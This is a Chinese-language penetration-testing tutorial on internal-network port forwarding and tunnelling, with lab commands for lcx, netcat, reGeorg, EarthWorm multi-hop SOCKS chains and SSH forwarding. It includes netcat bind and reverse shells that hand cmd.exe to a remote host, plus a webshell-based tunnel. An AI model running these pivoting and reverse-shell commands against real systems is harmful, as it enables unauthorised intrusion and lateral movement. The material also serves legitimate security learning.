MiscSecNotes / 内网端口转发及穿透. md at master · JnuSimba/MiscSecNotes

> 本文由 [简悦 SimpRead](http://ksria.com/simpread/) 转码， 原文地址 [github.com](https://github.com/JnuSimba/MiscSecNotes/blob/master/%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91/%E5%86%85%E7%BD%91%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91%E5%8F%8A%E7%A9%BF%E9%80%8F.md)

原文 by (由) [CH_vksec](http://ch.vksec.com/2017/06/blog-post_72.html)

最近尝试了一些内网端口的转发和内网穿透，现在一起总结一下。

![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-1.png)

[](#0x01-正向和反向代理)0x01 正向和反向代理
-----------------------------

正向代理中，proxy 和 client (客户端) 同属一个 LAN，对 server 透明； 反向代理中，proxy 和 server 同属一个 LAN，对 client (客户端) 透明。 实际上 proxy 在两种代理中做的事都是代为收发请求和响应，不过从结构上来看正好左右互换了下，所以把前者那种代理方式叫做正向代理，后者叫做反向代理。

### [](#正向代理-forward-proxy)正向代理 ( Forward (向前) Proxy)

Lhost－－》proxy－－》Rhost  
Lhost 为了访问到 Rhost，向 proxy 发送了一个请求并且指定目标是 Rhost，然后 proxy 向 Rhost 转交请求并将获得的内容返回给 Lhost，简单来说正向代理就是 proxy 代替了我们去访问 Rhost。

### [](#反向代理reverse-proxy)反向代理（ reverse (逆向) proxy）

Lhost<--->proxy<--->firewall<--->Rhost  
和正向代理相反（废话），Lhost 只向 proxy 发送普通的请求，具体让他转到哪里，proxy 自己判断，然后将返回的数据递交回来，这样的好处就是在某些防火墙只允许 proxy 数据进出的时候可以有效的进行穿透

### [](#简单区分)简单区分

正向代理代理的是客户端，反向代理代理的是服务端，正向代理是我们自己 (Lhost) 戴套 (proxy) 插进去，反向代理是她 (Rhost) 主动通过上位 (proxy) 坐上来 (Lhost)。

[](#0x02-lcx-转发)0x02 lcx 转发
---------------------------

内网 IP：192.168.153.138  
公网 ip：192.168.153.140  
由于是本地实验，我这里将 138 的防火墙打开，当作内网环境，140 防火墙关闭，充当公网 ip，所以正常情况下不只能 138 访问 140，而 140 不能直接访问 138。这是两台机器互相 ping 的结果。

![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-2.png)

![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-3.png)

1.  内网机器上执行：lcx.exe – slave (奴隶) 公网 IP + 端口 内网 IP + 端口  
    `lcx.exe –slave 192.168.153.140 4444 192.168.153.138 3389`  
    
    ![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-4.png)
    
      
    将内网 (192.168.153.138) 的 3389 端口转发到公网 (192.168.153.138) 的 4444 端口
    
2.  公网 (192.168.153.138) 执行：`lcx -listen 4444 5555`  
    
    ![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-5.png)
    
      
    监听公网 4444 端口请求，并将 4444 的请求传送给 5555 端口。 此时已经把内网的 3389 端口转发到了公网的 5555 端口。可以通过 127.0.0.1:5555 连接到内网的远程桌面。  
    
    ![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-6.png)

![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-7.png)

[](#0x03-nc-反弹)0x03 nc 反弹
-------------------------

### [](#正向连接)正向连接

在内网执行

`nc -l -p 5555 -t -e cmd.exe`

![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-8.png)

-t 是通过 telne 模式执行 cmd.exe 程序，可以省略。  
在公网执行

`nc -nvv 192.168.153.138 5555`

![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-9.png)

### [](#反向连接)反向连接

在公网监听 nc -lp 5555

![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-10.png)

在内网机器反弹 nc -t -e cmd 192.168.153.140 5555

![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-11.png)

[](#0x04-socks-代理工具)0x04 socks (袜子) 代理工具
----------------------------------------

常见的 socks (袜子) 代理工具介绍如下

1.  Earthworm 工具网址：[http://rootkiter.com/EarthWorm](http://rootkiter.com/EarthWorm)  
    EW 是一套便携式的网络穿透工具，具有 SOCKS (袜子) v5 服务架设和端口转发两大核心功能，可在复杂网络环境下完成网络穿透。该工具能够以 "正向"、"反向"、"多级级联" 等方式打通一条网络隧道，直达网络深处，用蚯蚓独有的手段突破网络限制，给防火墙松土。工具包中提供了多种可执行文件，以适用不同的操作系统，Linux、Windows、MacOS、Arm-Linux 均被包括其内, 强烈推荐使用。  
    目前已经有了最新版 Termite，工具网址：[http://rootkiter.com/Termite/](http://rootkiter.com/Termite/)
    
2.  reGeorg 工具网址：[https://github.com/NoneNotNull/reGeorg](https://github.com/NoneNotNull/reGeorg)  
    reGeorg 是 reDuh 的升级版，主要是把内网服务器的端口通过 http/https 隧道转发到本机，形成一个回路。用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口。它利用 webshell 建立一个 socks (袜子) 代理进行内网穿透，服务器必须支持 aspx、php 或 jsp 这些 web (网络) 程序中的一种。
    
3.  sSocks 工具网址：[http://sourceforge.net/projects/ssocks/](http://sourceforge.net/projects/ssocks/)  
    sSocks 是一个 socks (袜子) 代理工具套装，可用来开启 socks (袜子) 代理服务，支持 socks5 验证，支持 IPV6 和 UDP，并提供反向 socks 代理服务，即将远程计算机作为 socks 代理服务端，反弹回本地，极大方便内网的渗透测试，其最新版为 0.0.13。
    
4.  SocksCap64 工具网址：[http://www.sockscap64.com](http://www.sockscap64.com) (需翻墙)  
    SocksCap64 是一款在 windows 下相当好使的全局代理软件。SocksCap64 可以使 Windows 应用程序通过 SOCKS (袜子) 代理服务器来访问网络而不需要对这些应用程序做任何修改, 即使某些本身不支持 SOCKS (袜子) 代理的应用程序通过 SocksCap64 之后都可以完美的实现代理访问。
    
5.  proxychains 工具网址：[http://proxychains.sourceforge.net/](http://proxychains.sourceforge.net/)  
    Proxychains 是一款在 LINUX 下可以实现全局代理的软件，性能相当稳定可靠。在使任何程序通過代理上网，允許 TCP 和 DNS 通過代理隧道，支持 HTTP、SOCKS4、SOCKS5 類型的代理服务器，支持 proxy chain (链) ，即可配置多个代理，同一個 proxy chain (链) 可使用不同类型的代理服务器

### [](#0x041-regeorgproxychains-代理)0x04.1 reGeorg+Proxychains 代理

上传 reGeorg 的 tunnel.jsp 到服务器。访问链接，并转发到本地端口。

`python reGeorgSocksProxy.py -p 1080 -u http://192.168.153.137/tunnel.jsp`

![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-12.png)

使用设置 proxychains 的代理端口，进行访问，一般配合 nmap 和 metasploit 进行后续内网渗透。ps：proxychains 不支持 udp 和 icmp 协议，所以使用 nmap 要加上 - sT -Pn 即使用 tcp 协议且不使用 icmp 协议。

![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-13.png)

### [](#0x042-ew-穿透)0x04.2 ew 穿透

该工具借用了 ssocks 和 lcx.exe 的操作逻辑，并进行更多的功能强化。

![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-14.png)

说明

目前工具提供六种链路状态，可通过 -s 参数进行选定，分别为:  
`ssocksd rcsocks rssocks lcx_slave lcx_tran lcx_listen`  
其中 SOCKS5 服务的核心逻辑支持由 ssocksd 和 rssocks 提供，分别对应正向与反向 SOCKS (袜子) 代理。  
其余的 lcx 链路状态用于打通测试主机同 socks (袜子) 服务器之间的通路。  
lcx 类别管道：  
lcx_slave 该管道一侧通过反弹方式连接代理请求方，另一侧连接代理提供主机。  
lcx_tran 该管道，通过监听本地端口接收代理请求，并转交给代理提供主机。  
lcx_listen 该管道，通过监听本地端口接收数据，并将其转交给目标网络回连的代理提供主机。  
通过组合 lcx 类别管道的特性，可以实现多层内网环境下的渗透测试。  
下面是一个三级跳的本地测试例子。

```
./ew -s rcsocks -l 1080 -e 8888     
./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999     
./ew -s lcx_listen -l 9999 -e 7777     
./ew -s rssocks -d 127.0.0.1 -e 7777
```

数据流向为 IE -> 1080 -> 8888 -> 9999 -> 7777 -> rssocks

#### [](#0x0421-正向-socks5-服务器)0x04.2.1 正向 SOCKS5 服务器

当目标网络边界存在公网 IP 且可任意开监听端口

`ew_for_Win.exe -s ssocksd -l 8888`

![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-15.png)

上述命令是在该机器（192.168.153.140）开启一个 8888 的正向连接端口。然后其它主机可通过设置代理为 192.168.153.140:8888 添加这个代理。这里使用的是 proxychains

![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-16.png)

#### [](#0x0422-反弹-socks5-服务器)0x04.2.2 反弹 SOCKS5 服务器

当目标网络边界不存在公网 IP，通过反弹方式创建 socks (袜子) 代理。  
先在一台具有公网 ip 的主机 A 上运行以下命令

`./ew_for_linux64 -s rcsocks -l 1080 -e 8888`

![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-17.png)

意思是在我们公网 VPS 上添加一个转接隧道，把 1080 端口收到的代理请求转交给 8888 端口

在目标主机 B 上启动 SOCKS5 服务 并反弹到公网主机的 8888 端口

`ew_for_Win.exe -s rssocks -d 192.168.153.129 -e 8888`

![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-18.png)

本地主机（192.168.153.129）然后通过添加公网 192.168.153.129:1080 这个代理, 来访问内网机器（192.168.153.129） 当然如果本地主机如果是公网 ip，就可以把在公网执行的步骤放在本地执行即可。

![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-19.png)

#### [](#0x0423-二级网络环境一)0x04.2.3 二级网络环境（一）

假设我们获得了右侧 A 主机和 B 主机的控制权限，A 主机配有 2 块网卡，一块 10.129.72.168 连通外网，一块 192.168.153.140 只能连接内网 B 主机，无法访问内网其它资源。B 主机可以访问内网资源，但无法访问外网。

![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-20.png)

先上传 ew 到 B 主机，利用 ssocksd 方式启动 8888 端口的 SOCKS (袜子) 代理，命令如下

`ew_for_Win.exe -s ssocksd -l 8888`  
然后在 A 主机执行

`ew_for_Win.exe -s lcx_tran -l 1080 -f 192.168.153.138 -g 8888`

![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-21.png)

含义是将 1080 端口收到的代理请求转交给 B 主机（192.168.153.138）的 8888 端口  
然后 My pc 就可以通过 A 的外网代理 10.129.72.168:1080 访问 B。

![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-22.png)

#### [](#0x0424-二级网络环境二)0x04.2.4 二级网络环境（二）

假设我们获得了右侧 A 主机和 B 主机的控制权限，A 主机没有公网 IP，也无法访问内网资源。B 主机可以访问内网资源，但无法访问外网。

![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-23.png)

这次操作有四步。

1.  在公网 vps（45.xxx.xxx.72）添加转接隧道，将 10800 端口收到的代理请求转交给 8888 端口  
    `./ew_for_linux64 -s lcx_listen -l 10800 -e 8888`  
    
    ![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-24.png)
    
2.  B（192.168.153.138）主机正向开启 8888 端口  
    `ew_for_Win.exe -s ssocksd -l 9999`  
    
    ![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-25.png)
    
3.  A 主机利用 lcx_slave 方式，将公网 VPS 的 888 端口和 B 主机的 999 端口连接起来  
    `ew_for_Win.exe -s lcx_slave -d 45.xxx.xxx.72 -e 8888 -f 192.168.153.138 -g 9999`  
    
    ![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-26.png)
    
4.  现在 my pc 可通过访问 45.xxx.xxx.72:10800 来使用 192.168.153.138 主机提供的 socks5 代理，代理成功，vps 会有 rssocks cmd_socket OK! 提示

![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-27.png)

![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-28.png)

[](#0x05-ssh-隧道代理转发)0x05 ssh 隧道代理转发
-----------------------------------

ssh 有三个强大的端口转发命令，分别是本地转发、远程转发、动态转发。

本地访问 127.0.0.1:port1 就是 host:port2(用的更多)  
`ssh -CfNg -L port1:127.0.0.1:port2 user@host` #本地转发  
访问 host:port2 就是访问 127.0.0.1:port1  
`ssh -CfNg -R port2:127.0.0.1:port1 user@host` #远程转发  
可以将 dmz_host 的 hostport 端口通过 remote_ip 转发到本地的 port 端口  
`ssh -qTfnN -L port:dmz_host:hostport -l user remote_ip` #正向隧道 监听本地 port (港口) 可以将 dmz_host 的 hostport 端口转发到 remote_ip 的 port 端口  
`ssh -qTfnN -R port:dmz_host:hostport -l user remote_ip` #反向隧道  
用于内网穿透防火墙限制之类  
socket 代理: `ssh -qTfnN -D port remotehost`

参数详解：  
-q Quiet (安静) mode (模式) . 安静模式  
-T Disable (禁用) pseudo-tty allocation. 不占用 shell (壳) 了  
-f Requests (请求) ssh to go to background (背景) just (只是) before command (命令) execution. 后台运行，并推荐加上 -n 参数 -N Do not execute a remote (远程) command (命令) . 不执行远程命令，端口转发就用它了  
`-L port:host:hostport` 将本地机 (客户机) 的某个端口转发到远端指定机器的指定端口. 工作原理是这样的, 本地机器上分配了一个 socket 侦听 port (港口) 端口, 一旦这个端口上有了连接, 该连接就经过安全通道转发出去, 同时远程主机和 host (主机) 的 hostport 端口建立连接. 可以在配置文件中指定端口的转发. 只有 root (根) 才能转发特权端口.  
IPv6 地址用另一种格式说明: `port/host/hostport -R port:host:hostport` 将远程主机 (服务器) 的某个端口转发到本地端指定机器的指定端口. 工作原理是这样的, 远程主机上分配了一个 socket 侦听 port (港口) 端口, 一旦这个端口上有了连接, 该连接就经过安全通道转向出去, 同时本地主机和 host (主机) 的 hostport 端口建立连接. 可以在配置文件中指定端口的转发. 只有用 root (根) 登录远程主机才能转发特权端口.  
IPv6 地址用另一种格式说明: port (港口) /host/hostport -D port (港口) 指定一个本地机器 "动态的'' 应用程序端口转发. 工作原理是这样的, 本地机器上分配了一个 socket 侦听 port 端口, 一旦这个端口上有了连接, 该连接就经过安全通道转发出去, 根据应用程序的协议可以判断出远程主机将和哪里连接. 目前支持 SOCKS (袜子) 协议, 将充当 SOCKS (袜子) 服务器. 只有 root (根) 才能转发特权端口. 可以在配置文件中指定动态端口的转发.

### [](#0x051-ssh-本地转发)0x05.1 ssh 本地转发

远程管理服务器上的 mysql，mysql 不能直接 root (根) 远程登陆。这时候就可以通过本地转发，通过 ssh 将服务器的 3306 端口转发到本地 1234 端口

`ssh -CfNg -L 1234 127.0.0.1:3306 root@45.32.31.121`

![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-29.png)

### [](#0x052-ssh-远程转发)0x05.2 ssh 远程转发

内网的服务器，外网不能直接访问，使用远程转发，将内网的服务器端口转发到外网端口。这时候访问外网的端口，就访问到了内网的端口。

`ssh -CfNg -R 81:127.0.0.1:80 root@192.168.153.142`

![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-30.png)

![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-31.png)

现在在 192.168.153.142 访问 127.0.0.1:81 就是访问内网的服务器的 80 端口。

### [](#0x053-ssh-动态转发-socks-代理)0x05.3 ssh 动态转发 socks (袜子) 代理

把远程主机设置成代理，来代理访问不能访问的资源。在地机器上分配了一个监听端口, 一旦这个端口上有了连接, 该连接就经过 ssh 隧道转发出去, 根据应用程序的协议可以判断出远程主机将和哪里连接。

`ssh -qTfnN -D 1080 root@45.32.31.121`

![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-32.png)

![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-33.png)